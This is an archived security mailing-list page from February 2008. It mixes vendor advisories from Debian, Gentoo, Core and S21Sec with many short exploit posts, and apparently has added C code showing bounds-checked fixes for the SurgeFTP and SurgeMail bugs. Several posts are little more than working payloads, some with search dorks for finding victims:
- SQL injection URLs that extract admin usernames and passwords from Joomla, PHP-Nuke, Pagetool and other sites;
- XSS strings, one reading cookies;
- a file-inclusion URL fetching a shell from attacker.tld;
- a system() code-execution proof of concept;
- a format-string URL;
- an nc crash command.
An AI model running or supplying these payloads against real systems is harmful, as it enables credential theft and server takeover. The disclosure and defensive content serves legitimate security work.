NULL pointer in SurgeFTP 2.3a2

2008-02-25 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  SurgeFTP
              http://www.netwinsite.com/surgeftp/
Versions:     <= 2.3a2
Platforms:    Windows, Linux and Solaris
Bug:          NULL pointer access
Exploitation: remote
Date:         25 Feb 2008
Author:       Luigi Auriemma
              e-mail: [EMAIL PROTECTED]
              web:    aluigi.org


###


1) Introduction
2) Bug
3) The Code
4) Fix


###

===
1) Introduction
===


SurgeFTP is a commercial FTP server which also supports SSL/TLS and has
a web interface for remote administration.


###

==
2) Bug
==


When a Content-Length parameter is received from the client, SurgeFTP
tries to allocate the amount of memory (max 2147483647 bytes) specified
in this field and then copies the data into the resulting new buffer.
The problem is the lack of checks on the result of the allocation,
which leads to a crash of the entire server during the copying of the
data to a NULL pointer if that amount of memory cannot be allocated.


###

===
3) The Code
===


http://aluigi.org/poc/surgeftpizza.txt

  nc SERVER 7021 -v -v < surgeftpizza.txt


###

==
4) Fix
==


No fix


###


--- 
Luigi Auriemma
http://aluigi.org
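The unchecked allocation described in the post, shown as an added example that is not SurgeFTP's code: a Content-Length handler that parses the header strictly, caps the body at an assumed MAX_BODY_LEN before calling the allocator, and refuses to copy when the allocation fails. The cap, the status codes and the function names are assumptions, not SurgeFTP's.

```c
/* Added example, not SurgeFTP code: a Content-Length handler that parses the header
 * strictly, caps the body before calling the allocator, and never copies into a NULL
 * buffer. MAX_BODY_LEN, the status codes and the function names are assumptions. */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_BODY_LEN (1024u * 1024u)   /* hypothetical per-request cap */

enum body_status {
    BODY_OK = 0,
    BODY_BAD_LENGTH,  /* missing, signed, non-numeric or out-of-range header */
    BODY_TOO_LARGE,   /* declared size exceeds MAX_BODY_LEN */
    BODY_TRUNCATED,   /* fewer bytes received than declared */
    BODY_NO_MEMORY    /* allocator returned NULL: the case the advisory says went unchecked */
};

/* Parse a Content-Length value strictly: digits only, no sign, no whitespace, no overflow. */
static int parse_content_length(const char *value, size_t *out)
{
    char *end;
    unsigned long long n;

    if (value == NULL || *value < '0' || *value > '9')
        return 0;
    errno = 0;
    n = strtoull(value, &end, 10);
    if (errno == ERANGE || *end != '\0' || n > SIZE_MAX)
        return 0;
    *out = (size_t)n;
    return 1;
}

/* Copy the declared body into a fresh buffer. Every failure path leaves *body NULL. */
enum body_status read_body(const char *content_length,
                           const unsigned char *data, size_t data_len,
                           unsigned char **body, size_t *body_len)
{
    size_t len;
    unsigned char *buf;

    *body = NULL;
    *body_len = 0;
    if (!parse_content_length(content_length, &len))
        return BODY_BAD_LENGTH;
    if (len > MAX_BODY_LEN)
        return BODY_TOO_LARGE;     /* a 2147483647-byte request never reaches malloc */
    if (data_len < len)
        return BODY_TRUNCATED;     /* never read past what was actually received */
    buf = malloc(len ? len : 1);   /* malloc(0) may legally return NULL */
    if (buf == NULL)
        return BODY_NO_MEMORY;     /* the missing check: no memcpy into NULL */
    memcpy(buf, data, len);
    *body = buf;
    *body_len = len;
    return BODY_OK;
}

/* Convenience wrapper: status for a NUL-terminated body string. */
enum body_status check_request(const char *content_length, const char *body)
{
    unsigned char *out;
    size_t n;
    enum body_status st = read_body(content_length, (const unsigned char *)body,
                                    strlen(body), &out, &n);
    free(out);
    return st;
}

/* Self-check of the success path: 5 declared bytes out of 11 received are copied exactly. */
int read_body_copies_declared_prefix(void)
{
    unsigned char *out;
    size_t n;
    int ok;

    if (read_body("5", (const unsigned char *)"hello world", 11, &out, &n) != BODY_OK)
        return 0;
    ok = (n == 5 && memcmp(out, "hello", 5) == 0);
    free(out);
    return ok;
}

int main(void)
{
    /* Constructed header values: the advisory's maximum and a few malformed ones. */
    printf("2147483647 -> %d (BODY_TOO_LARGE is %d)\n", check_request("2147483647", "x"), BODY_TOO_LARGE);
    printf("-1         -> %d (BODY_BAD_LENGTH is %d)\n", check_request("-1", "x"), BODY_BAD_LENGTH);
    printf("prefix copy ok: %d\n", read_body_copies_declared_prefix());
    return 0;
}
```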


Re: Powered by Pagetool Ver (1.04-05-06-07)

2008-02-25 Thread packet
Discovered in June '07:

http://packetstormsecurity.org/0706-exploits/pagetool-sql.txt


On Sun, Feb 24, 2008 at 10:00:41AM -, [EMAIL PROTECTED] wrote:
> Google search:
> www.1923turk.org
> 
> Turkishwariorr
> 
> Powered by Pagetool Ver 1.04
> Powered by Pagetool Ver 1.07
> Powered by Pagetool Ver 1.05
> Powered by Pagetool Ver 1.06
> 
> 
> 
> At the end of the site:
> 
> index.php?name=pagetool_news&news_id=-1/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,passwd),2,3,4,5/**/FROM/**/pt_core_users/**/WHERE/**/groups/**/LIKE/**/0x2561646D696E25/*


Format string and buffer-overflow in SurgeMail 38k4

2008-02-25 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  SurgeMail Mail Server
              http://netwinsite.com/surgemail/
              Netwin's WebMail
              http://netwinsite.com/webmail/
Versions:     SurgeMail <= 38k4 and beta 39a
              Netwin's WebMail <= 3.1s (only bug A)
Platforms:    Windows, Linux, FreeBSD, MacOSX and Solaris
Bugs:         A] format string in webmail.exe's page command
              B] buffer-overflow in the building of environment strings
Exploitation: remote
Date:         25 Feb 2008
Author:       Luigi Auriemma
              e-mail: [EMAIL PROTECTED]
              web:    aluigi.org


###


1) Introduction
2) Bugs
3) The Code
4) Fix


###

===
1) Introduction
===


SurgeMail is a well-known commercial multiplatform mail server which
supports many protocols.


###

===
2) Bugs
===

--
A] format string in webmail.exe's page command
--

The CGI used for the handling of the webmail interface (webmail.exe) is
affected by a format string vulnerability in the function which builds
the error message when a wrong page is requested and passes it directly
to lvprintf without the needed format argument:

  "TPL: Failed to Locate Template 
{c:\surgemail\webmail\panel\%s%s%s%s%s%s.tpl}{2=No such file or directory}"

Sample URL for exploiting the vulnerability:

  http://SERVER/scripts/webmail.exe?page=%n%n%n%s%s%s%s


-
B] buffer-overflow in the building of environment strings
-

A buffer overflow vulnerability is located in the function which
handles the real CGI executables (which must not be confused with the
.cgi virtual files like user.cgi, admin.cgi and so on).
When the server receives an HTTP request for a real CGI (like for
example webmail.exe) it uses a buffer of about 2 bytes for storing
all the environment strings which will be passed to the called program.
The HTTP fields passed by the client in his request are truncated at
200 bytes for the parameter and 800 for its value and are added as
environment variables (HTTP_parameter=value).
The lack of checks on the size of this environment buffer leads to a
buffer-overflow; anyway, although it is possible to control some
registers, code execution is not certain.

Naturally both the surgemail and the swatch (port 7027) processes are
affected by this vulnerability.


###

===
3) The Code
===


http://aluigi.org/poc/surgemailz.zip


###

==
4) Fix
==


No fix


###


--- 
Luigi Auriemma
http://aluigi.org
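Both SurgeMail bugs, as an added example that is not SurgeMail's or Netwin's code: a CGI environment builder that applies the 200/800-byte header truncation from the post and checks the remaining space in a fixed buffer before appending each HTTP_name=value entry (bug B), and a template-miss message that passes the page name as a "%s" argument rather than as the format string (bug A). ENV_BUF_SIZE and all function names are assumptions.

```c
/* Added example, not SurgeMail/Netwin code. ENV_BUF_SIZE is assumed; the 200/800-byte
 * truncation and the HTTP_name=value layout are the ones the advisory describes. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define ENV_BUF_SIZE 4096   /* hypothetical capacity of the environment block */
#define MAX_NAME     200    /* header name truncated here, as in the advisory */
#define MAX_VALUE    800    /* header value truncated here, as in the advisory */

struct env_block {
    char   data[ENV_BUF_SIZE];
    size_t used;            /* bytes consumed, including each entry's terminating NUL */
};

/* strnlen equivalent, kept local so the example needs only ISO C. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* Append "HTTP_<NAME>=<value>" plus NUL. Returns 0 and changes nothing when the entry
 * would not fit: the size check on the environment buffer that bug B lacked. */
int env_add_header(struct env_block *env, const char *name, const char *value)
{
    size_t nlen = bounded_len(name, MAX_NAME);
    size_t vlen = bounded_len(value, MAX_VALUE);
    size_t need = 5 + nlen + 1 + vlen + 1;   /* "HTTP_" + name + "=" + value + NUL */

    if (env->used > ENV_BUF_SIZE || need > ENV_BUF_SIZE - env->used)
        return 0;
    char *p = env->data + env->used;
    memcpy(p, "HTTP_", 5);
    p += 5;
    for (size_t i = 0; i < nlen; i++) {   /* CGI convention: upper-case, '-' becomes '_' */
        unsigned char c = (unsigned char)name[i];
        p[i] = (c == '-') ? '_' : (char)toupper(c);
    }
    p += nlen;
    *p++ = '=';
    memcpy(p, value, vlen);               /* bounded copy: over-long values stop at 800 */
    p += vlen;
    *p = '\0';
    env->used += need;
    return 1;
}

/* Bug A counterpart: the requested page name is a "%s" argument, never the format
 * itself, so "%n" or "%s" inside it is copied literally instead of being interpreted. */
int format_template_error(char *out, size_t outsz, const char *page)
{
    int n = snprintf(out, outsz, "TPL: Failed to Locate Template {%s.tpl}", page);
    return n >= 0 && (size_t)n < outsz;
}

/* Self-check: the page name survives verbatim inside the formatted message. */
int template_error_keeps_page_literal(const char *page)
{
    char msg[256];
    if (!format_template_error(msg, sizeof msg, page))
        return 0;
    return strstr(msg, page) != NULL;
}

/* Self-check: a normal header lands in the expected CGI form. */
int env_first_entry_matches(const char *name, const char *value, const char *expected)
{
    static struct env_block env;
    env.used = 0;
    return env_add_header(&env, name, value) && strcmp(env.data, expected) == 0;
}

/* Self-check: count maximum-size headers accepted before the bound refuses one. Each
 * costs 5 + 200 + 1 + 800 + 1 = 1007 bytes, so 4 fit in 4096; -1 if ever overrun. */
int env_capacity_check(void)
{
    static struct env_block env;
    char name[MAX_NAME + 50], value[MAX_VALUE + 50];   /* deliberately over-long inputs */
    int count = 0;
    memset(name, 'a', sizeof name - 1);  name[sizeof name - 1] = '\0';
    memset(value, 'v', sizeof value - 1); value[sizeof value - 1] = '\0';
    env.used = 0;
    while (env_add_header(&env, name, value))
        count++;
    return env.used <= ENV_BUF_SIZE ? count : -1;
}

int main(void)
{
    /* Constructed inputs: a benign header and the advisory's sample page parameter. */
    printf("User-Agent entry ok: %d\n", env_first_entry_matches("User-Agent", "Mozilla/5.0", "HTTP_USER_AGENT=Mozilla/5.0"));
    printf("max-size headers that fit: %d\n", env_capacity_check());
    printf("page name kept literal: %d\n", template_error_keeps_page_literal("%n%n%n%s%s%s%s"));
    return 0;
}
```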


[SECURITY] [DSA 1508-1] New diatheke packages fix arbitrary shell command execution

2008-02-25 Thread Thijs Kinkhorst
------------------------------------------------------------------------
Debian Security Advisory DSA-1508-1  [EMAIL PROTECTED]
http://www.debian.org/security/  Thijs Kinkhorst
February 25, 2008 http://www.debian.org/security/faq
------------------------------------------------------------------------

Package: diatheke
Vulnerability  : insufficient input sanitising
Problem type   : remote
Debian-specific: no
CVE Id : CVE-2008-0932
Debian Bug : 466449

Dan Dennison discovered that Diatheke, a CGI program to make a bible
website, performs insufficient sanitising of a parameter, allowing a
remote attacker to execute arbitrary shell commands as the web server
user.

For the stable distribution (etch), this problem has been fixed in version
1.5.9-2etch1.

For the old stable distribution (sarge), this problem has been fixed in
version 1.5.7-7sarge1.

For the unstable distribution (sid), this problem has been fixed in version
1.5.9-8.

We recommend that you upgrade your diatheke package.


Upgrade instructions
--------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
--------------------------------

Source archives:


Powered by Pagetool Ver (1.04-05-06-07)

2008-02-25 Thread turkish-warrorr
Google search:

www.1923turk.org


Turkishwariorr


Powered by Pagetool Ver 1.04

Powered by Pagetool Ver 1.07

Powered by Pagetool Ver 1.05

Powered by Pagetool Ver 1.06




At the end of the site:


index.php?name=pagetool_news&news_id=-1/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,passwd),2,3,4,5/**/FROM/**/pt_core_users/**/WHERE/**/groups/**/LIKE/**/0x2561646D696E25/*


Wordpress Plugin Sniplets 1.1.2 Multiple Vulnerabilities

2008-02-25 Thread nbbn

Wordpress Plugin Sniplets 1.1.2 Multiple Vulnerabilities by NBBN

1) Remote File Inclusion

File: /modules/syntax_highlight.php
Register Globals: ON
Vuln code:
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://attacker.tld/shell.txt?




2) Cross-Site Scripting

Register Globals: ON
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/notice.php?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/inset.php?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/submenu.php?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=%3Cli%3E

Register Globals: Off

Vuln Line:(3) 
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/pager.php?page=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E


3) Remote Code Execution

Register Globals: ON
Code: 
'.$text;

eval ('?>'.$text);
?>

PoC:
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=%3C?php%20system(%22ls%22);



Aria-Security.Net: Joomla Com_publication "pid" Remote SQL Injection

2008-02-25 Thread No-Reply
Aria-Security Team (Persian Security Network)

http://Aria-Security.Net

---

Shoutz: Aura, imm02tal, Kinglet, iM4n


Joomla Com_publication "pid" Remote SQL Injection


index.php?option=com_publication&task=view&pid=-999+union/**/select+0,username,password,0,0,0,0/**/from/**/jos_users/*


note: the prefix (jos_) may be different for each website...


Regards,

The-0utl4w

Credits go to Aria-Security Team


CORE-2007-0930 Path Traversal vulnerability in VMware's shared folders implementation

2008-02-25 Thread Core Security Technologies Advisories

Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs

Path Traversal vulnerability in VMware's shared folders implementation

*Advisory Information*

Title: Path Traversal vulnerability in VMware's shared folders implementation
Advisory ID: CORE-2007-0930
Advisory URL: http://www.coresecurity.com/?action=item&id=2129
Date published: 2008-02-25
Date of last update: 2008-02-25
Vendors contacted: VMware Inc.
Release mode: User release

*Vulnerability Information*

Class: Input Validation Error
Remotely Exploitable: Yes
Locally Exploitable: Yes
Client-side Exploitable: No
Bugtraq ID: 27944
CVE Name: CVE-2008-0923

*Vulnerability Description*

Software from VMWare Inc. allows users to run an entire computer system
composed of hardware, OS and applications within a virtualized environment
isolated from the real hardware resources and the computer system that
controls them. Virtualization technologies such as VMware's increase
efficiency in the use of hardware and help to reduce operational costs
through consolidation of servers and desktop system running on fewer and
more maintainable hardware systems.

Among the many reasons that promote the adoption of virtualization
technologies, one of the most common today is the promise of an improved
information security posture due to the implied isolation between multiple
virtualized systems (referred to as Guest systems) and the non-virtualized
systems controlling the virtualization hardware and software (the Host
system) [1].

Consequently, software bugs that could allow potential attackers to
invalidate the premise of effective isolation between Host and Guest
systems are considered security vulnerabilities with a potentially high
impact. Attacks exploiting these types of vulnerabilities have been
discussed on several public forums [2][3]. To maintain and improve user
inter-operation between virtualized and non-virtualized systems, VMware's
software implements a number of inter-system communication features. The
Shared Folder mechanism is one such feature and is enabled by default
in all VMware's products that provide it.

VMware's shared folders allow users to transfer data between a virtualized
system (Guest) and the non-virtualized Host system that contains it. This
form of data transfer is available to users of the Guest system through
read and write access to file system folders shared by both Guest and Host
system. To maintain effective isolation between Guest and Host systems,
these mechanisms should limit access from the Guest only to the Host
system's folders that are selected for sharing with the virtualized guests.

A vulnerability was found in VMware's shared folders mechanism that grants
users of a Guest system read and write access to any portion of the Host's
file system including the system folder and other security-sensitive
files. Exploitation of this vulnerability allows attackers to break out
of an isolated Guest system to compromise the underlying Host system that
controls it.

Successful exploitation requires that the Shared Folders feature be
enabled (which is the default on VMware products that have the feature) AND
that at least one folder of the Host system is configured for sharing.

*Vulnerable Packages*

. VMWare Workstation 6.0.2
. VMWare Workstation 5.5.4
. VMWare Player 2.0.2
. VMWare Player 1.0.4
. VMWare ACE 2.0.2
. VMWare ACE 1.0.2

*Non-vulnerable Packages*

. VMWare ESX
. VMWare Server

*Vendor Information, Solutions and Workarounds*

Disable the Shared Folders feature for all virtual machines. On VMWare
Workstation this can be done by clicking on "Edit virtual machine
settings" and disabling shared folders in the Options tab.

The vendor has published a security alert with a step-by-step description
of how to disable Shared Folders on affected products.

*Critical VMware Security Alert for Windows-Hosted VMware Workstation,
VMware Player, and VMware ACE*
http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=1004034

*Credits*

This vulnerability was discovered by Gerardo Richarte while developing an
exploit for vulnerability CVE-2007-1744. The final exploit for both
vulnerabilities was developed by Nicolas Economou, both of them from CORE
IMPACT's Exploit Writing Team (EWT), Core Security Technologies.

*Technical Description / Proof of Concept Code*

While developing an exploit for the CVE-2007-1744 vulnerability [4] the
root cause of the original bug was identified in the way that the
'PathName' parameter is processed by the VMware API that provides the
Shared Folders functionality in the Guest operating system.

The 'PathName' parameter is converted from a multi byte string to a wide
character string after verifying that it doesn't contain the dot-dot
substring (the two-byte sequence '0x2e0x2e' that translates to the ASCII
substring '".."') that may allow a malicious user to break out of the
shared 

[ GLSA 200802-10 ] Python: PCRE Integer overflow

2008-02-25 Thread Robert Buchholz
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200802-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Python: PCRE Integer overflow
  Date: February 23, 2008
  Bugs: #198373
ID: 200802-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A vulnerability within Python's copy of PCRE might lead to the
execution of arbitrary code.

Background
==

Python is an interpreted, interactive, object-oriented programming
language.

Affected packages
=

---
 Package  /  Vulnerable  /  Unaffected
---
  1  dev-lang/python < 2.3.6-r4>= 2.3.6-r4

Description
===

Python 2.3 includes a copy of PCRE which is vulnerable to an integer
overflow vulnerability, leading to a buffer overflow.

Impact
==

An attacker could exploit the vulnerability by tricking a vulnerable
Python application into compiling a regular expression, which could
possibly lead to the execution of arbitrary code, a Denial of Service
or the disclosure of sensitive information.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Python 2.3 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/python-2.3.6-r4"

References
==

  [ 1 ] CVE-2006-7228
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7228
  [ 2 ] GLSA 200711-30
http://www.gentoo.org/security/en/glsa/glsa-200711-30.xml

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200802-10.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




Packeteer Products File Listing XSS

2008-02-25 Thread nnposter
Packeteer Products File Listing XSS



Product:


Packeteer PacketShaper

http://www.packeteer.com/products/packetshaper/


Packeteer PolicyCenter

http://www.packeteer.com/products/packetshaper/policycenter.cfm



The web management interface of several Packeteer products contains a 
cross-site scripting vulnerability in the file listing function. Parameter 
FILELIST, specified in an arbitrary page request, is not sufficiently sanitized 
before it gets embedded in the HTML output of the Error Report page. (The 
parameter value is limited to 64 characters.)


Example:

https://(target)/whatever.htm?FILELIST=%3C/script%3E%3Cbody+onLoad=alert(%26quot%3BXSS%26quot%3B)%3E%3Cscript%3E



The vulnerability has been identified in version 8.2.2. However, other versions 
may also be affected.



Solution:

Do not stay logged into the Packeteer web management interface while browsing 
other web sites.



Found by:

nnposter



Php Nuke "Sell" module SQL Injection ("cid")

2008-02-25 Thread no-reply
Aria-Security Team (Persian Security Network)

http://Aria-Security.Net



Shoutz: Aura, imm02tal, Kinglet, iM4n

Php Nuke "Sell" module SQL Injection  ("cid")



modules.php?name=Sell&d_op=viewsell&cid=-999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202


Original Advisory: 

http://forum.aria-security.net/showthread.php?p=1475


Regards,

The-0utl4w

Credits go to Aria-Security Team



[SECURITY] [DSA 1506-1] New iceape packages fix several vulnerabilities

2008-02-25 Thread Moritz Muehlenhoff
------------------------------------------------------------------------
Debian Security Advisory DSA-1506-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Moritz Muehlenhoff
February 24, 2008 http://www.debian.org/security/faq
------------------------------------------------------------------------

Package: iceape
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2008-0412 CVE-2008-0413 CVE-2008-0414 CVE-2008-0415
 CVE-2008-0417 CVE-2008-0418 CVE-2008-0419 CVE-2008-0591
 CVE-2008-0592 CVE-2008-0593 CVE-2008-0594

Several remote vulnerabilities have been discovered in the Iceape internet
suite, an unbranded version of the Seamonkey Internet Suite. The Common
Vulnerabilities and Exposures project identifies the following problems:

CVE-2008-0412

Jesse Ruderman, Kai Engert, Martijn Wargers, Mats Palmgren and Paul
Nickerson discovered crashes in the layout engine, which might allow
the execution of arbitrary code.

CVE-2008-0413

Carsten Book, Wesley Garland, Igor Bukanov, "moz_bug_r_a4", "shutdown",
Philip Taylor and "tgirmann" discovered crashes in the Javascript
engine, which might allow the execution of arbitrary code.

CVE-2008-0414

"hong" and Gregory Fleisher discovered that file input focus
vulnerabilities in the file upload control could allow information
disclosure of local files.

CVE-2008-0415

"moz_bug_r_a4" and Boris Zbarsky discovered several
vulnerabilities in Javascript handling, which could allow
privilege escalation.

CVE-2008-0417

Justin Dolske discovered that the password storage mechanism could
be abused by malicious web sites to corrupt existing saved passwords.

CVE-2008-0418

Gerry Eisenhaur and "moz_bug_r_a4" discovered that a directory
traversal vulnerability in chrome: URI handling could lead to
information disclosure.

CVE-2008-0419

David Bloom discovered a race condition in the image handling of
designMode elements, which can lead to information disclosure or
potentially the execution of arbitrary code.

CVE-2008-0591

Michal Zalewski discovered that timers protecting security-sensitive
dialogs (which disable dialog elements until a timeout is reached)
could be bypassed by window focus changes through Javascript.

CVE-2008-0592

It was discovered that malformed content declarations of saved
attachments could prevent a user from opening local files
with a ".txt" file name, resulting in a minor denial of service.

CVE-2008-0593

Martin Straka discovered that insecure stylesheet handling during
redirects could lead to information disclosure.

CVE-2008-0594

Emil Ljungdahl and Lars-Olof Moilanen discovered that phishing
protections could be bypassed with  elements.

For the stable distribution (etch), these problems have been fixed in
version 1.0.12~pre080131b-0etch1.

The Mozilla releases from the old stable distribution (sarge) are no
longer supported with security updates.

We recommend that you upgrade your iceape packages.

Upgrade instructions
--------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian 4.0 (stable)
-------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  

S21SEC-040-en: Infinite invalid authentication attempts possible in BEA WebLogic Server

2008-02-25 Thread S21sec labs
##

- S21Sec Advisory -

##

    Title:   Infinite invalid authentication attempts possible in BEA
             WebLogic Server
       ID:   S21SEC-040-en
 Severity:   Medium
    Scope:   BEA WebLogic
Platforms:   All
   Author:   [EMAIL PROTECTED]
      URL:   http://www.s21sec.com/avisos/s21sec-040-en.txt
  Release:   Public



[ SUMMARY ]

It's possible to launch a credentials brute force attack against known
users through an internal servlet that permits the bypass of the user
locking mechanism.


[ AFFECTED VERSIONS ]

The vulnerability was confirmed on:
7.0sp6
8.1sp4
9.0sp2

Versions 6 and previous are not vulnerable.


[ DESCRIPTION ]

BEA WebLogic Server is the world-leading application server software.

To avoid credential brute force attacks, WebLogic Server has a locking
mechanism that locks the corresponding account after some invalid login
attempts.

The default lock is triggered if 5 invalid login attempts are made. The lock
remains for 30 minutes.

S21SEC has found that there exists an internal servlet that allows the
guessing of valid credentials even if the attacked account is locked.

This allows infinite invalid authentication attempts against an account.
When the correct credentials are guessed, it is only necessary to wait for the
account to unlock and then log on to the server.

The affected servlet is:

/wl_management_internal1/LogfileSearch (Version 7 & 8)
/bea_wls_diagnostics/accessor (Version 9)


[ WORKAROUND ]

BEA has released an advisory about this vulnerability. Updates and more
information are available at Bea website:

http://dev2dev.bea.com/pub/advisory/271

[ ACKNOWLEDGMENTS ]

This vulnerability has been found and researched by:

Ramon Pinuaga Cascales 


[ REFERENCES ]

http://dev2dev.bea.com/pub/advisory/271



Alkacon OpenCms tree_files.jsp resource XSS

2008-02-25 Thread nnposter
Alkacon OpenCms tree_files.jsp resource XSS



Product: Alkacon OpenCms 

http://www.opencms.org/



OpenCms contains a cross-site scripting vulnerability in the file tree 
navigation function. An invalid value supplied to parameter resource in page 
opencms/system/workplace/views/explorer/tree_files.jsp is not sanitized before 
it gets embedded in the HTML output as part of a JavaScript comment.


Example:

http://(target)/opencms/opencms/system/workplace/views/explorer/tree_files.jsp?resource=+*/+alert(document.cookie);+/*+/



The vulnerability has been identified in version 7.0.3. However, other versions 
may also be affected.



Solution:

Users should not browse untrusted sites while logged into OpenCms.



Found by:

nnposter



[SECURITY] [DSA 1507-1] New turba2 packages fix permission testing

2008-02-25 Thread Steve Kemp
------------------------------------------------------------------------
Debian Security Advisory DSA-1507-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Steve Kemp
February 24, 2008 http://www.debian.org/security/faq
------------------------------------------------------------------------

Package: turba2
Vulnerability  : programming error
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2008-0807
Debian Bug : 464058

Peter Paul Elfferich discovered that turba2, a contact management component
for the Horde framework, did not correctly check access rights before allowing
users to edit addresses.  This could result in valid users being able to
alter private address records.

For the stable distribution (etch), this problem has been fixed in version
2.1.3-1etch1.

For the old stable distribution (sarge), this problem has been fixed in
version 2.0.2-1sarge1.

For the unstable distribution (sid), this problem has been fixed in version
2.1.7-1.

We recommend that you upgrade your turba2 package.


Upgrade instructions
--------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
--------------------------------

Source archives:



Debian GNU/Linux 4.0 alias etch
-------------------------------

Source archives:

  


  These files will probably be moved into the stable distribution on
  its next update.

------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show ' and http://packages.debian.org/



Pigyard Art Gallery Multiple SQL Injection

2008-02-25 Thread No-Reply
Aria-Security Team, 

http://Aria-Security.net

---

Shout Outs: AurA, imm02tal, iM4N, Kinglet,

Vendor: Pigyard Art Gallery Multiple SQL Injection

This is a completion of the original advisory reported by ZoRLu @ Milw0rm 
(http://www.milw0rm.com/exploits/5181)


Original Link: http://forum.aria-security.net/showthread.php?p=1474


module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-99/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/*

module.php?module=gallery&modPage=show_picture_full&artist=16&exhibition=&portfolio=module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-99/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/*



Regards,

The-0utl4w

Credits go to Aria-Security.Net



Softbiz jokes and funny pictures (index.php) sql injection

2008-02-25 Thread Hamza Almersoumi
Script: Softbiz jokes & funny pictures
Author: -=Mizo=-
Dork: inurl:/index.php?sbcat_id=


Exploit: /index.php?sbcat_id=-1 union select
0,1,2,concat(sbadmin_name,0x3a,sbadmin_pwd),4,5,6,7,8,9 from
sbjks_admin/*
Admin cpanel: /path/admin

Greetz: L!0n - Red_casper - SoSo H H - DC - Iraqi_strike - Crack_man -
B0rizQ - Mahmood_ali - Net^Virus - iraqi_strike and all my friends!!


Joomla com_inter "id" Remote SQL Injection

2008-02-25 Thread no-reply
Aria-Security Team (Persian Security Network)

http://Aria-Security.Net

---

Shoutz : AurA, Sc0rp!on, mormoroth, Kinglet, iM4N, 

Joomla com_inter "id" Remote SQL Injection


index.php?option=com_inter&op=The-0utl4wz&id=-11/**/union/**/select/**/username,1,2,3,password,5,6,7,8,9/**/from/**/jos_user


(Original Advisory@ http://forum.aria-security.net/showthread.php?p=1464)


The-0utl4w

Aria-Security Team

(Credits to Aria-Security Team)



Joomla Com_blog "pid" Remote SQL Injection

2008-02-25 Thread no-reply
Aria-Security Team (Persian Security Network)

http://Aria-Security.Net

---

Shoutz : The-0utl4w, Sc0rp!on, T3rr0r1st, mormoroth, Kinglet

Joomla Com_blog "pid" Remote SQL Injection


index.php?option=com_blog&name=aria-Security.Net&task=view&pid=SQL INJECTION


(More info and guide on how to use this bug @ 
